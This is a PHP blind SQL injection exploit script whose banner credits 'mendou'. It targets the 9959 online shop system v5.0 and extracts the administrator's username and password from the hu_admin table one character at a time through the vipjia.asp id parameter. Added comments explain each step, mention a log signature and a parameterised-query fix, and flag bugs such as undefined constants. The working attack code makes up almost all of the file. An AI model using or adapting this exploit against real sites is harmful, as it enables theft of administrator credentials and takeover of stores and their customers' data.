<?php
// Proof-of-concept blind SQL injection script (as its own banner states)
// against one specific shop product. The banner text is printed verbatim.
print_r('
+---------------------------------------------------------------------------+
9959网店系统 v5.0 Blind SQL injection exploit by mendou
官方网站:<a href="http://www.9959shop.com" target="_blank">www.9959shop.com</a>
+---------------------------------------------------------------------------+
');
// Argument check: $argv[1] is the host, $argv[2] the record id. Only the host
// is required by this condition even though both values are read below.
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host id
Example:
php '.$argv[0].' localhost id
+---------------------------------------------------------------------------+
');
exit;
}
// All PHP diagnostics are silenced, so failed HTTP requests, undefined
// constants and similar faults produce no output; the execution time limit is
// removed because every probe is a separate HTTP round trip.
error_reporting(0);
ini_set('max_execution_time', 0);
$host = $argv[1];
// Candidate alphabet for a single extracted character: only these 36 values
// (lowercase ASCII letters and digits) are ever compared.
$str = "abcdefghijklmnopqrstuvwxyz0123456789";
$strlen =strlen($str);
// Record id whose page is probed; each injected predicate is appended to it.
$pid = $argv[2];
// NOTE: adminname and password below are bare (undefined) constants rather
// than quoted strings; the resulting warning is hidden by error_reporting(0),
// and PHP 8 raises an Error for undefined constants instead.
$n_len = lenstr(adminname); // username length
echo "用户长度:".$n_len."\r\n";
pojie("adminname",$n_len);echo "\r\n";
$p_len = lenstr(password); // password length
echo "密码长度:".$p_len."\r\n";
pojie("password",$p_len);
// Recovers one column of the first hu_admin row one character at a time:
// for each position 1..$len, every character of the global alphabet $str is
// tried in turn by appending a boolean predicate to the id parameter and
// checking whether the response body still contains the marker "次". A full
// run therefore issues up to 36 GET requests per character.
// Defender's view: every probe is a GET to /user/vipjia.asp?action=loads whose
// id value ends in "%20and%20(select%20top%201%20mid(" ... "from%20hu_admin)".
// That repeated, sequential suffix on a single id is a straightforward web-log
// alert, and a parameterised id lookup on the server removes the issue entirely.
// Parameters: $str1 is the column name spliced into the query; $len is the
// number of positions to recover (as returned by lenstr()). Matched
// characters are echoed; nothing is returned.
function pojie($str1,$len){
global $host,$strlen,$str,$pid;
for ($j=1 ; $j<=$len ; $j++){
for ($i=0 ; $i<$strlen ; $i++){
// Predicate: the $j-th character of the column equals the candidate $str[$i].
$exp = "%20and%20(select%20top%201%20mid(".$str1.",".$j.",1)%20from%20hu_admin)='".$str[$i]."'";
// Plain GET with no error handling; on failure $a is false and the test
// below is simply false (the warning is silenced by the caller's settings).
$a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
// Loose comparison with true: a non-zero strpos() offset counts as a hit.
if (strpos($a,"次")==true){
echo $str[$i];break;
}
}
}
}
// Determines the length of a hu_admin column value (username or password).
// Probes len(<column>) = 1, 2, ..., 30 using the same boolean-response test
// as the character extraction: a request per candidate length, a hit when the
// marker "次" is found in the response body. Returns the first matching length;
// returns null implicitly when no value in 1..30 matches (the caller's
// position loop then runs zero iterations).
// Parameter: $str is the column name spliced into the query.
function lenstr($str){
global $host,$pid;
// Upper bound of 30 is hard-coded; longer values are never detected.
for ($i=1 ; $i <= 30; $i++){
$exp = "%20and%20(select%20top%201%20len(".$str.")%20from%20hu_admin)=".$i;
// Unhandled GET: false on failure, which the strpos() test treats as a miss.
$a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
// Loose comparison with true: a non-zero strpos() offset counts as a hit.
if (strpos($a,"次")==true){
return $i;
}
}
}
?>